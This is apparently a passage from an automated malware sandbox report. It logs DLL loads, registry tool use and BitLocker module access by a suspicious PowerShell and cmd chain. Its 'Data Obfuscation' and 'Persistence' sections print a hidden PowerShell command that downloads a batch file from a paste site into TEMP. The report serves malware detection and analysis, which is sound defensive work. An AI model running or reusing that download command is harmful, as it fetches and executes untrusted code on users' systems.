          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7F00AD pushad ; iretd 4_2_00007FFD9B7F00C1

          Persistence and Installation Behavior

          barindex
          Tries to download and execute files (via powershell)
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"Jump to behavior
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
